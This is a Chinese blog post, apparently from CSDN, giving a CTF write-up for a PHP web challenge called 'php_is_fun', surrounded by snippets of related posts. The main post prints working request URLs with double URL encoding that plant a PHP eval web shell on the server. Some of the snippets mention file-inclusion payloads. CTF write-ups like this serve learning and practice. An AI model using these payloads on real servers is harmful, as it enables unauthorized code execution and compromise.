WEB 杂记

最新推荐文章于 2023-03-27 19:04:16 发布
最新推荐文章于 2023-03-27 19:04:16 发布
阅读量5.4k 收藏
点赞数
分类专栏: write-up
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31481187/article/details/71366101
版权

把早期的web题刷一刷,把其中一些比较好的给记录下来以便整理、学习

1. php_is_fun

第七季极客大挑战

<?php
if(isset($_GET) && !empty($_GET)){
    $url = $_GET['file'];
    $path = "upload/".$_GET['path'];
}else{
    show_source(__FILE__);
    exit();
}

if(strpos($path,'..') > -1){
    die('SYCwaf!');
}

if(strpos($url,'http://127.0.0.1/') === 0){
    file_put_contents($path, file_get_contents($url));
    echo "console.log($path update successed!)";
}else{
    echo "Hello.Geeker";
}

题目分析:
我们,整个题目的输入只有两个地方pathfile我们要构造的payload也只能从这两个地方传入。两个参数的作用很简单这里就不说了。
我们的目的是将我的文件内容写入文件,发现了他会把path打印出来
这里写图片描述
因此我们想到利用二次传参,第一层将我们要写的内容打印出来,第二层将打印的内容写入文件
http://127.0.0.1/2.php?path=%3C?php%20@eval($_POST[1]);?%3E&file=http://127.0.0.1/
这里写图片描述
http://127.0.0.1/2.php?path=jj.php&file=http://127.0.0.1/2.php?path=%3C?php%20@eval($_POST[1]);?%3E&file=http://127.0.0.1/注意二次编码
最后提交
http://127.0.0.1/2.php?path=aaz.php&file=http://127.0.0.1/2.php?path=%253C%253Fphp%2520@eval%2528%2524_POST%255B1%255D%2529%253B%253F%253E%26file=http://127.0.0.1/
这里写图片描述
然后访问aaz.php
这里写图片描述

4ct10n
关注
专栏目录
SpringBoot Web项目杂记
wjlzx的博客
10-23 243
一、整合多数据源 1、pom文件引入依赖 <!-引入mybatis-> <dependency> <groupId>org.mybatis.spring.boot</groupId> <artifactId>mybatis-spring-boot-starter</artifactI...
.net core 杂记WebAPI的XML请求和响应
weixin_30539625的博客
07-03 4098
一般情况下,restfult api 进行数据返回或模型绑定,默认json格式会比较常见和方便,当然偶尔也会需要以XML格式的要求 对于返回XML,普通常见的方式就是在每个aciton方法进行诸如XmlFormatter此类的序列化处理, 而对于接收XML,则是进行一些额外的XML解析操作或反序列化处理。 下面记录和学习较为便捷的WebAPI的XML请求和响应处理使用,不喜勿喷,有错请指教...
ssrfme
o3Ev的博客
05-02 435
ssrfme 题目: 打开环境,得到: <?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){ die('This is a waf!'); } if(
php中的isset函数,深入理解PHP中的empty和isset函数
weixin_27310985的博客
03-09 559
近日被问到PHP中empty和isset函数时怎么判断变量的,刚开始我是一脸懵逼的,因为我自己也只是一知半解,为了弄懂其真正的原理,赶紧翻开源码研究研究。经过分析可发现两个函数调用的都是同一个函数,因此本文将对两个函数一起分析。我在github有对PHP源码更详细的注解。感兴趣的可以围观一下,给个star。PHP5.4源码注解。可以通过commit记录查看已添加的注解。函数使用格式emptyboo...
php中isset 函数,php中isset与empty函数的困惑与用法分析
weixin_28895433的博客
03-10 155
本文实例讲述了php中isset与empty函数的困惑与用法。分享给大家供大家参考,具体如下:在学习php有一段时间之后,感觉自己的基础知识还是有点不牢固,有的问题就不怎么知道,比如就有一个,在判断一个变量是否为空的情况下,我就不知道是用isset()还是empty()。今天我就来分析该用哪个函数。isset():用于判断一个函数是否被设置过,如果设置过就为true,否则就为false,但是有一个...
CTFshow web入门——文件包含
小元砸的博客
02-07 3886
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
2016第七季极客大挑战web部分write up
berTrAM_Chan的博客
11-02 2076
2016第七季极客大挑战web部分
mynane#web-problem#杂记-18.获取运行环境1
07-25
// 获取userAgent// 是否是ie// 是否是IE9// 是否是edge浏览器// 是否是android浏览器// 是否是ios// 是否是谷歌浏览器
mynane#web-problem#杂记-45.Golang 在 Mac、Linux、Windows 下如何交叉编译1
07-25
Mac 下编译 Linux 和 Windows 64位可执行程序Linux 下编译 Mac 和 Windows 64位可执行程序Windows 下编译 Mac
java杂记.txt
04-24
除了Java基础之外,还有一小部分web方面的知识,如:JSP、EL表达式、JSTL、过滤器与监听器之类的知识,但是只有一小部分
PHP的各种安全问题总结 一文了解PHP的各类漏洞和绕过姿势
闵行小鱼塘
11-26 4454
尽可能全面的总结PHP的各种安全问题:基础知识、弱类型及各种函数、伪协议、反序列化、其他,本篇持续更新
BMZCTF ssrfme 端午节就该吃粽子 pchar???
最新发布
weixin_52268949的博客
03-27 447
空格等特殊字符如果不进行编码,服务器在处理的时候可能出现问题,通过浏览器的方式访问的话,空格会自动编码为%20或者+,但我们通过上述方法嵌套参数,让服务器自己去请求http的时候就会出现问题,解决方法是进行二次编码。因为第二点说了web服务器默认就会对解析后的参数进行url解码,所以php最开始解析我们的参数时进行了一个解码,服务器通过http伪协议去访问时又会对解析后的参数进行一次解码,所以我们可以进行二次编码。|拼接执行指令\绕过对cat的匹配${IFS}绕过对空格的匹配,?并且长度不能大于70。
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6333
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
php代码审计【9】SQL 注入研究
司徒荆的博客
06-27 1167
https://www.cnblogs.com/shellr00t/p/5701184.html参考
网络安全实验室CTF练习部分题目(持续更新)
热门推荐
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
php 使用$_GET获取信息为空时,报错解决方法
l304729926的博客
05-27 8917
PHP中,在使用$_GET、$_SESSION等方法进行获取信息时,若数据为空则会报错,在网上查找办法如 if(isset($_GET['id'])){}else{} 但并没有去掉报错信息。 我的解决办法:若只有此类错误,在php首行加入error_reporting(0);能在浏览器页面中去掉报错消息。
RSA 常见攻击方法
4ct10n
04-22 1万+
0x01 RSA简介 那么,有无可能在已知n和e的情况下,推导出d? 首先要知道   (1)ed≡1 (mod φ(n))。只有知道e和φ(n),才能算出d。   (2)φ(n)=(p-1)(q-1)。只有知道p和q,才能算出φ(n)。   (3)n=pq。只有将n因数分解,才能算出p和q。 结论:如果n可以被因数分解,d就可以算出,也就意
极客大挑战2016-部分wp
xuqi7
11-03 5006
签到题 SYC{We1c0m3_To_G33k_2O!6} 闪的好快 Stegsolve  Frame Broswer模式,然后扫二维码就可以了 SYC{F1aSh_so_f4sT} xiao彩蛋 关注三叶草微博私信flag即可 SYC{2o16_Geek_c0m3_0n} Come_game 学弟大神做的,生成的一个save1文件中存储人物的
Oracle编程与体系结构杂记:VARCHAR2特性解析
Oracle杂记文档提供了一个深入理解Oracle编程和体系结构的个人笔记。主要讨论了Oracle数据库中的重要知识点,特别是`varchar`与`varchar2`这两种数据类型的区别。 1. **Oracle的varchar与varchar2**: - `varchar2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值